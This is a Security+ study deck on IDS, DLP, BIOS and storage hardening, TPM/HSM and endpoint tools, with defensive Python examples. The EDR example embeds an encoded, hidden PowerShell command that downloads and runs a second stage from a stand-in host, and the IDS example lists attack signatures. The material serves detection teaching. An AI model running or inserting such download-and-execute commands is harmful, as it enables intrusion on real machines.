
CompTIA Security+ (SY0-601): Security Applications & Devices

Information Technology | 11 cards | Created 8 months ago

This section outlines methods for detecting and preventing unauthorized activity, including Intrusion Detection Systems (IDS) and Data Loss Prevention (DLP) solutions. It also covers best practices for securing BIOS configurations and protecting network and storage systems like NAS/SAN from unauthorized access and data breaches.

IDS & IDS Alerts

Intrusion Detection System:
Passively monitors traffic (from a mirror/SPAN port or a host agent) and alerts on attacks it identifies; it does not block them, which is what separates it from an IPS
HIDS = Host-based | NIDS = Network-based
Detection methods: Signature-based, Policy-based, Anomaly-based

True Positive: Malicious activity is identified as an attack
False Positive: Legitimate activity is identified as an attack (wasted analyst time)
True Negative: Legitimate activity is identified as legitimate traffic
False Negative: Malicious activity is identified as legitimate traffic (the attack is missed)
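The card's three detection methods and its four alert outcomes are easiest to see side by side. The Python below is an added example, not part of the original deck: it runs a signature rule, a policy rule and an anomaly rule over a small constructed traffic sample whose ground truth is known, then scores every connection as a true/false positive/negative and derives precision, recall and false-positive rate. The sample connections, the signature strings and the "no telnet" policy are all assumptions made for the demonstration.

```python
import statistics
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Conn:
    src: str
    dst_port: int
    payload: str
    malicious: bool  # ground truth: known only because this traffic is constructed


# Constructed traffic sample (not a capture). A benign telnet session and a C2 beacon
# over TLS are included on purpose to produce one false positive and one false negative.
SAMPLE = [
    Conn("10.0.0.5", 80, "GET /index.html", False),
    Conn("10.0.0.5", 443, "TLS ClientHello", False),
    Conn("10.0.0.7", 80, "GET /../../etc/passwd", True),      # path traversal
    Conn("10.0.0.8", 23, "login: admin", True),                # telnet brute force
    Conn("10.0.0.9", 80, "GET /robots.txt", False),
    Conn("10.0.0.9", 80, "GET /about.html", False),
    Conn("10.0.0.2", 23, "legacy switch console", False),      # admin on an old switch
    Conn("10.0.0.11", 443, "TLS ClientHello", True),           # C2 beacon that looks like HTTPS
] + [Conn("10.0.0.50", p, "SYN", True) for p in (21, 22, 25, 53, 80, 110, 143, 443)]  # port scan

# Signature-based: match known-bad content (assumed signature list).
SIGNATURES = ("/etc/passwd", "cmd.exe", "UNION SELECT")

# Policy-based: flag traffic the organisation has declared unacceptable (assumed policy).
FORBIDDEN_PORTS = {23}  # no telnet anywhere


def signature_match(c: Conn) -> bool:
    return any(sig in c.payload for sig in SIGNATURES)


def policy_violation(c: Conn) -> bool:
    return c.dst_port in FORBIDDEN_PORTS


def anomalous_sources(conns, factor: int = 3) -> set:
    """Anomaly-based: a source opening far more connections than the typical host."""
    counts = Counter(c.src for c in conns)
    baseline = statistics.median(counts.values())
    return {src for src, n in counts.items() if n > factor * baseline}


def evaluate(conns) -> dict:
    """Run all three methods and score every connection as TP/FP/TN/FN."""
    anomalous = anomalous_sources(conns)
    outcome = Counter()
    for c in conns:
        alerted = signature_match(c) or policy_violation(c) or c.src in anomalous
        if alerted and c.malicious:
            outcome["TP"] += 1
        elif alerted and not c.malicious:
            outcome["FP"] += 1
        elif not alerted and not c.malicious:
            outcome["TN"] += 1
        else:
            outcome["FN"] += 1
    return dict(outcome)


def _ratio(n: int, d: int) -> float:
    return n / d if d else 0.0


def metrics(outcome: dict) -> dict:
    tp, fp = outcome.get("TP", 0), outcome.get("FP", 0)
    tn, fn = outcome.get("TN", 0), outcome.get("FN", 0)
    return {
        "precision": _ratio(tp, tp + fp),            # share of alerts that were real
        "recall": _ratio(tp, tp + fn),               # share of attacks that were caught
        "false_positive_rate": _ratio(fp, fp + tn),  # share of benign traffic that alerted
    }


if __name__ == "__main__":
    result = evaluate(SAMPLE)
    print(result)
    print(metrics(result))
```

The benign telnet session to the legacy switch becomes the false positive and the C2 beacon that looks like ordinary HTTPS becomes the false negative: the first costs analyst time, the second is the miss that the behavioral tools later in this deck (EDR, UEBA) exist to reduce. Tuning the anomaly factor trades one against the other.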



DLP & 3 Types of DLPs

Data Loss Prevention (Software or Hardware):
Monitors a system's data while in use, in transit, or at rest and detects (and, depending on policy, blocks) attempts to exfiltrate it

Also called Information Leak Protection (ILP) or Extrusion Prevention System (EPS)

Network DLP System
Software or hardware-based solution installed at the network perimeter to inspect data in transit (email, web uploads, file transfers)

Storage DLP System
Software installed on servers in the datacenter to inspect data at rest

Cloud DLP System
Cloud software as a service (SaaS) that protects data stored in cloud services
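All three DLP types share one content-inspection engine; only where it sits differs. The Python below is an added example, not code from the deck or from any DLP product, of such an engine run over a constructed outbound mail queue: it finds card numbers by pattern plus Luhn check, SSNs by format, classification markings by keyword, maps each finding to a block/alert/allow action, and redacts what gets logged. The message bodies, patterns and policy actions are assumptions made for the demonstration.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Primary account numbers: 13-19 digits, optionally separated by spaces or dashes.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
# US SSN in its formatted form (format check only; real products add validation lists).
SSN_RE = re.compile(r"(?<!\d)\d{3}-\d{2}-\d{4}(?!\d)")
# Classification labels an organisation stamps on its documents (assumed labels).
MARKINGS = ("CONFIDENTIAL", "INTERNAL ONLY")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: separates real card numbers from order/tracking numbers of the same shape."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_pans(text: str) -> List[str]:
    hits = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(digits)
    return hits


@dataclass
class Verdict:
    action: str                                    # "block", "alert" or "allow"
    findings: List[Tuple[str, int]] = field(default_factory=list)


def inspect(text: str) -> Verdict:
    """The content-inspection engine; the same logic serves network, storage and cloud DLP."""
    findings = []
    pans = find_pans(text)
    if pans:
        findings.append(("PAN", len(pans)))
    ssns = SSN_RE.findall(text)
    if ssns:
        findings.append(("SSN", len(ssns)))
    marks = [m for m in MARKINGS if m in text.upper()]
    if marks:
        findings.append(("MARKING", len(marks)))
    if pans:
        action = "block"   # cardholder data must never leave in the clear
    elif ssns or marks:
        action = "alert"   # notify the security team, let the transfer continue
    else:
        action = "allow"
    return Verdict(action, findings)


def redact(text: str) -> str:
    """What the DLP log stores: never the full card number, only its last four digits."""
    def mask(m):
        digits = re.sub(r"[ -]", "", m.group())
        return "*" * (len(digits) - 4) + digits[-4:] if luhn_ok(digits) else m.group()
    return PAN_RE.sub(mask, text)


# Constructed outbound mail queue (network DLP: data in transit). Not real messages.
OUTBOUND = {
    "mail-01": "Hi, charge card 4111 1111 1111 1111 exp 12/27, thanks",
    "mail-02": "Your order 1234 5678 9012 3456 has shipped",   # same shape, fails Luhn
    "mail-03": "Please find the CONFIDENTIAL roadmap attached",
    "mail-04": "Lunch at noon?",
}


def scan_all(messages: dict) -> dict:
    return {mid: inspect(body).action for mid, body in messages.items()}


if __name__ == "__main__":
    for mid, body in OUTBOUND.items():
        v = inspect(body)
        print("%s: %-5s %s | %s" % (mid, v.action, v.findings, redact(body)))
```

The Luhn check is the kind of validation that keeps a DLP usable: the order number in mail-02 has exactly the shape of a card number and would otherwise be a false positive that blocks legitimate business mail. A storage DLP would feed files instead of messages into the same `inspect()`.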

Securing BIOS

1. Flash the BIOS (keep the firmware on the vendor's latest release so known firmware vulnerabilities are patched)

2. Use a BIOS password (a supervisor/setup password, so the settings below cannot be changed without it)

3. Configure the BIOS boot order (internal disk first, so an attacker cannot boot the machine from their own USB or optical media)

4. Disable the external ports and devices that are not needed (USB, optical drives, unused NICs)

5. Enable the secure boot option (UEFI Secure Boot: the firmware only runs boot loaders signed by a trusted key)
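Step 5 can be verified from a running Linux system instead of by rebooting into the setup screen. The Python below is an added example, not part of the deck: it reads the SecureBoot and SetupMode UEFI variables through efivarfs (each file is a 4-byte attribute word followed by the variable's value), reports whether Secure Boot is actually in force, and records the firmware version strings from /sys/class/dmi/id so they can be compared with the vendor's current release (step 1). The function names and verdict strings are mine; the paths, the GUID and the variable layout come from efivarfs and the UEFI specification.

```python
import struct
from pathlib import Path
from typing import Optional, Tuple

# SecureBoot and SetupMode are UEFI global variables under EFI_GLOBAL_VARIABLE.
EFI_GLOBAL_GUID = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS = "/sys/firmware/efi/efivars"   # Linux efivarfs mount point
DMI = "/sys/class/dmi/id"               # firmware identity strings from SMBIOS


def parse_efivar(raw: bytes) -> Tuple[int, bytes]:
    """efivarfs files are a 4-byte little-endian attribute word followed by the variable data."""
    if len(raw) < 4:
        raise ValueError("efivar record shorter than its attribute header")
    (attrs,) = struct.unpack("<I", raw[:4])
    return attrs, raw[4:]


def one_byte_flag(raw: bytes) -> bool:
    """SecureBoot and SetupMode are single-byte booleans."""
    _, data = parse_efivar(raw)
    if len(data) != 1 or data[0] not in (0, 1):
        raise ValueError("unexpected flag payload %r" % (data,))
    return data[0] == 1


def assess(secure_boot: bool, setup_mode: bool) -> str:
    if not secure_boot:
        return "DISABLED: firmware will run unsigned boot loaders"
    if setup_mode:
        return ("WEAK: enabled, but the platform is in Setup Mode (no Platform Key enrolled), "
                "so the Secure Boot policy variables can be rewritten without authentication")
    return "OK: Secure Boot enabled, platform in User Mode"


def read_flag(name: str, efivars: str = EFIVARS) -> Optional[bool]:
    path = Path(efivars) / ("%s-%s" % (name, EFI_GLOBAL_GUID))
    try:
        return one_byte_flag(path.read_bytes())
    except (OSError, ValueError):
        return None   # variable absent: legacy BIOS boot, or not a Linux host


def audit(efivars: str = EFIVARS, dmi: str = DMI) -> dict:
    sb = read_flag("SecureBoot", efivars)
    sm = read_flag("SetupMode", efivars)
    report = {"secure_boot": sb, "setup_mode": sm}
    if sb is None:
        report["verdict"] = "UNKNOWN: no UEFI variables visible (legacy BIOS boot or no efivarfs)"
    else:
        report["verdict"] = assess(sb, bool(sm))
    # Step 1 of the list: record the running firmware build so it can be compared with the vendor's latest.
    for name in ("bios_vendor", "bios_version", "bios_date"):
        try:
            report[name] = (Path(dmi) / name).read_text().strip()
        except OSError:
            report[name] = None
    return report


if __name__ == "__main__":
    for key, value in audit().items():
        print("%s: %s" % (key, value))
```

`mokutil --sb-state` reports the same SecureBoot value; the reason to also read SetupMode is that a platform left in Setup Mode has no Platform Key enrolled, so anyone with root can rewrite the signature databases and Secure Boot protects nothing. Run the script as root to be sure efivarfs is readable.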

Securing NAS/SAN

1. Use data encryption (at rest on the array and in transit, e.g., SMB encryption for file shares, IPsec for iSCSI)

2. Use proper authentication (no anonymous or guest shares, per-user credentials, CHAP for iSCSI targets)

3. Log NAS access (and review the logs, so unauthorized access is detected rather than merely possible)

SED

Self-Encrypting Drive:

Storage device that performs whole disk encryption using hardware embedded in the drive itself; the data encryption key never leaves the drive, and the drive stays locked at boot until the user's password unlocks it

Disk Encryption Software

Apple: FileVault
Windows: BitLocker

TPM

Trusted Platform Module:
Chip on the motherboard that stores encryption keys in tamper-resistant hardware and performs cryptographic operations with them; disk encryption such as BitLocker can tie its key to the TPM so the disk only unlocks on that machine with an unmodified boot chain

If the motherboard doesn't have a TPM, BitLocker can instead use a startup key stored on an external USB drive

HSM

Hardware Security Module:

Physical device that acts as a secure cryptoprocessor: it generates, stores, and uses keys (signing, encryption) without ever exposing the private key material outside the device

EPP

Endpoint Protection Platform:
A software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, host firewall, DLP, and file encryption

EDR

Endpoint Detection & Response:
A software agent that collects system data (process, file, registry, and network events) and logs for analysis by a monitoring system to provide early detection of threats

Relies on behavioral analysis rather than signatures alone, so it can catch malware and living-off-the-land techniques that have no known signature
Behavioral analysis, ML, process monitoring
Lightweight agent on the endpoint
Root cause analysis: the recorded process tree shows how the threat got in, not just that it is present
Response: from the console the analyst can isolate the host, kill the process, or roll back its changes
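The behavioral, process-monitoring and root-cause points on this card all come down to the parent/child relationships between processes, which is the core data an EDR agent collects. The Python below is an added example, not code from the deck or from any EDR product: it runs two behavioral rules over a constructed stream of process-creation events (a shell descending from an Office application, and PowerShell started with an encoded command, which it decodes) and, for each hit, walks the parent chain back to the root to produce the root-cause view. The event stream, process names, rules and the `example.invalid` URL in the payload are assumptions made for the demonstration.

```python
import base64
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    ts: int
    pid: int
    ppid: int
    image: str
    cmdline: str


# The script PowerShell would run, encoded the way -EncodedCommand expects (UTF-16LE, base64).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not a real capture). pid 1 is the system root.
EVENTS = [
    ProcEvent(0, 400, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(1, 512, 400, "OUTLOOK.EXE", "OUTLOOK.EXE"),
    ProcEvent(2, 600, 512, "WINWORD.EXE", "WINWORD.EXE /n invoice.docm"),
    ProcEvent(3, 701, 600, "cmd.exe", "cmd.exe /c powershell -nop -w hidden -enc " + ENCODED),
    ProcEvent(4, 702, 701, "powershell.exe", "powershell -nop -w hidden -enc " + ENCODED),
    ProcEvent(5, 801, 400, "cmd.exe", "cmd.exe /c ipconfig /all"),   # admin at the desktop: benign
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    pid: int
    reasons: List[str]
    chain: List[str]                 # image names from the process up to its root ancestor
    decoded: Optional[str] = None


def index_by_pid(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestry(pid: int, index: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk parent links from pid to the root; this chain is the root-cause analysis."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        e = index[pid]
        chain.append(e)
        pid = e.ppid
    return chain


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (PowerShell accepts the -e/-ec/-enc prefixes)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-e", "-ec", "-enc", "-encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def detect(events: List[ProcEvent]) -> List[Finding]:
    index = index_by_pid(events)
    findings = []
    for e in sorted(events, key=lambda x: x.ts):
        reasons, decoded = [], None
        if e.image.lower() in SHELLS:
            # Behavioral rule 1: a shell anywhere beneath an Office application.
            for anc in ancestry(e.ppid, index):
                if anc.image.lower() in OFFICE:
                    reasons.append("%s descends from Office app %s (pid %d)" % (e.image, anc.image, anc.pid))
                    break
        if e.image.lower() in ("powershell.exe", "pwsh.exe"):
            # Behavioral rule 2: encoded, hidden PowerShell; the shape gives it away, no signature needed.
            decoded = decode_encoded_command(e.cmdline)
            if decoded is not None:
                reasons.append("PowerShell launched with an encoded command")
        if reasons:
            findings.append(Finding(e.pid, reasons, [p.image for p in ancestry(e.pid, index)], decoded))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print("pid %d: %s" % (f.pid, "; ".join(f.reasons)))
        print("  chain: " + " <- ".join(f.chain))
        if f.decoded:
            print("  decoded: " + f.decoded)
```

Neither rule needs a hash or byte signature: cmd.exe and powershell.exe are legitimate signed binaries, and what makes them malicious here is who launched them and how. The chain for pid 702 reads powershell.exe <- cmd.exe <- WINWORD.EXE <- OUTLOOK.EXE <- explorer.exe, i.e. a macro in a mailed document, which is the root cause an analyst would act on; the admin's cmd.exe under explorer.exe is left alone.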

UEBA

User & Entity Behavior Analytics:
A system that builds a baseline of normal behavior for each user account and host and automatically flags activity that deviates from it (logins at unusual hours or from unusual locations, bulk access to data the account never touched before)

UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence (AI) and machine learning (ML)

Many vendors now market advanced threat protection (ATP), advanced endpoint protection (AEP), and next-generation antivirus (NGAV), which are hybrids of EPP, EDR, and UEBA